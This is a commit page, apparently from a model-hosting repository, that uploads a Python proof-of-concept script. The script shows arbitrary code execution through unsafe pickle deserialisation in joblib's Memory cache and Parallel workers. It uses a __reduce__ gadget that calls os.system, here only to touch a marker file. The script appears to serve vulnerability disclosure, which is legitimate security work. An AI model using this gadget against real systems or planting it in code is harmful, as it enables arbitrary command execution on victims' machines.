rinimhack commited on
Commit
905ac41
·
verified ·
1 Parent(s): 06156df

Upload memory_parallel_poc.py

Browse files
Files changed (1) hide show
  1. memory_parallel_poc.py +65 -0
memory_parallel_poc.py ADDED
@@ -0,0 +1,65 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import joblib
2
+ from joblib import Parallel, delayed
3
+ import os
4
+ import shutil
5
+ import time
6
+
7
+ # 1. Setup a dynamic cache directory using the current timestamp
8
+ # This ensures the exploit runs successfully every time the reviewer executes it
9
+ timestamp = int(time.time())
10
+ cache_dir = f"./cache_{timestamp}"
11
+
12
+ class JoblibExploit:
13
+ def __init__(self, vector_name):
14
+ self.vector_name = vector_name
15
+
16
+ def __reduce__(self):
17
+ # The core vulnerability: Unsafe Deserialization
18
+ # This command creates a unique success file for each vector
19
+ success_file = f"{self.vector_name}_SUCCESS"
20
+ return (os.system, (f'touch {success_file}',))
21
+
22
+ def run_memory_test():
23
+ print(f"[*] Testing Vector 1: joblib.Memory (Cache dir: {cache_dir})")
24
+ mem = joblib.Memory(cache_dir)
25
+
26
+ @mem.cache
27
+ def cached_function(data):
28
+ return data
29
+
30
+ # Triggering the exploit via the caching mechanism
31
+ cached_function(JoblibExploit("MEMORY"))
32
+
33
+ def run_parallel_test():
34
+ print("[*] Testing Vector 2: joblib.Parallel (Task Distribution)")
35
+
36
+ def worker(data):
37
+ return data
38
+
39
+ # Triggering the exploit via parallel worker distribution
40
+ try:
41
+ Parallel(n_jobs=2)(delayed(worker)(JoblibExploit("PARALLEL")) for _ in range(1))
42
+ except:
43
+ pass
44
+
45
+ def verify_results():
46
+ mem_ok = os.path.exists("MEMORY_SUCCESS")
47
+ par_ok = os.path.exists("PARALLEL_SUCCESS")
48
+
49
+ print("\n" + "="*30)
50
+ print(f"[+] Memory ACE Status: {'VULNERABLE' if mem_ok else 'FAILED'}")
51
+ print(f"[+] Parallel ACE Status: {'VULNERABLE' if par_ok else 'FAILED'}")
52
+ print("="*30)
53
+
54
+ if mem_ok and par_ok:
55
+ print("\n[CRITICAL] Exploitation Successful: Arbitrary Code Execution confirmed.")
56
+
57
+ # Optional: Cleanup the newly created cache directory
58
+ if os.path.exists(cache_dir):
59
+ shutil.rmtree(cache_dir)
60
+
61
+ if __name__ == "__main__":
62
+ print("--- Starting Joblib Full ACE Proof of Concept ---")
63
+ run_memory_test()
64
+ run_parallel_test()
65
+ verify_results()